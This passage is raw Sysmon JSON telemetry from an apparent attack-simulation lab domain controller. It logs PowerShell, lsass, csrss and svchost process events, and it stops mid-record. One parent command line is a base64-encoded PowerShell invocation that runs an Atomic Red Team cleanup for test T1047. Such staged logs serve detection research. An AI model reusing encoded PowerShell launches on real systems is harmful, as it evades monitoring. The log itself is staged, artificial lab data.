{"EventTime":"2020-08-01 07:59:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5645,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:20.331\r\nProcessGuid: {41C8662E-20D8-5F25-0000-001089080900}\r\nProcessId: 1052\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_jvcdg22t.v5d.ps1\r\nCreationUtcTime: 2020-08-01 07:59:20.331","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:20.331","ProcessGuid":"{41C8662E-20D8-5F25-0000-001089080900}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_jvcdg22t.v5d.ps1","CreationUtcTime":"2020-08-01 07:59:20.331","EventReceivedTime":"2020-08-01 07:59:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5646,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:20.362\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-20D8-5F25-0000-001089080900}\r\nTargetProcessId: 1052\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:20.362","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-20D8-5F25-0000-001089080900}","TargetProcessId":"1052","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5647,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:20.362\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-20D8-5F25-0000-001089080900}\r\nTargetProcessId: 1052\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:20.362","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-20D8-5F25-0000-001089080900}","TargetProcessId":"1052","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5648,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:20.699\r\nProcessGuid: {41C8662E-20D8-5F25-0000-001029220900}\r\nProcessId: 2488\r\nImage: C:\\Windows\\System32\\HOSTNAME.EXE\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Hostname APP\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: hostname.exe\r\nCommandLine: \"C:\\Windows\\system32\\HOSTNAME.EXE\"\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {41C8662E-20D7-5F25-0000-0020ADE10800}\r\nLogonId: 0x8E1AD\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=1088BA1BF7CDDFF61ECC51BC0C02FDEF,SHA256=B8DA5A3AE4371E63DFD2F468E29CC23AA6F98A6A357A67955996F8F61E58FBA1,IMPHASH=D210D728CB9D45B4D1827BCE52F7EC6E\r\nParentProcessGuid: {41C8662E-20D8-5F25-0000-001089080900}\r\nParentProcessId: 1052\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADQANwAiACAALQBDAGwAZQBhAG4AdQBwAA==","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:20.699","ProcessGuid":"{41C8662E-20D8-5F25-0000-001029220900}","Image":"C:\\Windows\\System32\\HOSTNAME.EXE","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Hostname APP","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"hostname.exe","CommandLine":"\"C:\\Windows\\system32\\HOSTNAME.EXE\"","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{41C8662E-20D7-5F25-0000-0020ADE10800}","LogonId":"0x8e1ad","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=1088BA1BF7CDDFF61ECC51BC0C02FDEF,SHA256=B8DA5A3AE4371E63DFD2F468E29CC23AA6F98A6A357A67955996F8F61E58FBA1,IMPHASH=D210D728CB9D45B4D1827BCE52F7EC6E","ParentProcessGuid":"{41C8662E-20D8-5F25-0000-001089080900}","ParentProcessId":"1052","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"\"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADQANwAiACAALQBDAGwAZQBhAG4AdQBwAA==","EventReceivedTime":"2020-08-01 07:59:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5649,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:20.690\r\nSourceProcessGUID: {41C8662E-20D8-5F25-0000-001089080900}\r\nSourceProcessId: 1052\r\nSourceThreadId: 4312\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {41C8662E-20D8-5F25-0000-001029220900}\r\nTargetProcessId: 2488\r\nTargetImage: C:\\Windows\\system32\\HOSTNAME.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|UNKNOWN(00007FFD675C2F4B)|UNKNOWN(00007FFD66A64025)|UNKNOWN(00007FFD66A63CF6)|UNKNOWN(00007FFD6751510B)|UNKNOWN(00007FFD66A2488C)|UNKNOWN(00007FFD66A82D5B)|UNKNOWN(00007FFD66A663C0)|UNKNOWN(00007FFD66A663C0)|UNKNOWN(00007FFD66A663C0)|UNKNOWN(00007FFD66A66251)|UNKNOWN(00007FFD66A581D6)|UNKNOWN(00007FFD66A64709)|UNKNOWN(00007FFD66A642A5)|UNKNOWN(00007FFD66A64025)|UNKNOWN(00007FFD66A63CF6)|UNKNOWN(00007FFD6751510B)|UNKNOWN(00007FFD66A2488C)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:20.690","SourceProcessGUID":"{41C8662E-20D8-5F25-0000-001089080900}","SourceProcessId":"1052","SourceThreadId":"4312","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{41C8662E-20D8-5F25-0000-001029220900}","TargetProcessId":"2488","TargetImage":"C:\\Windows\\system32\\HOSTNAME.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|UNKNOWN(00007FFD675C2F4B)|UNKNOWN(00007FFD66A64025)|UNKNOWN(00007FFD66A63CF6)|UNKNOWN(00007FFD6751510B)|UNKNOWN(00007FFD66A2488C)|UNKNOWN(00007FFD66A82D5B)|UNKNOWN(00007FFD66A663C0)|UNKNOWN(00007FFD66A663C0)|UNKNOWN(00007FFD66A663C0)|UNKNOWN(00007FFD66A66251)|UNKNOWN(00007FFD66A581D6)|UNKNOWN(00007FFD66A64709)|UNKNOWN(00007FFD66A642A5)|UNKNOWN(00007FFD66A64025)|UNKNOWN(00007FFD66A63CF6)|UNKNOWN(00007FFD6751510B)|UNKNOWN(00007FFD66A2488C)","EventReceivedTime":"2020-08-01 07:59:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5650,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:20.690\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-20D8-5F25-0000-001029220900}\r\nTargetProcessId: 2488\r\nTargetImage: C:\\Windows\\system32\\HOSTNAME.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:20.690","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-20D8-5F25-0000-001029220900}","TargetProcessId":"2488","TargetImage":"C:\\Windows\\system32\\HOSTNAME.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:59:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5651,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:20.690\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:20.690","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5652,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:20.690\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:20.690","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5653,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:20.690\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 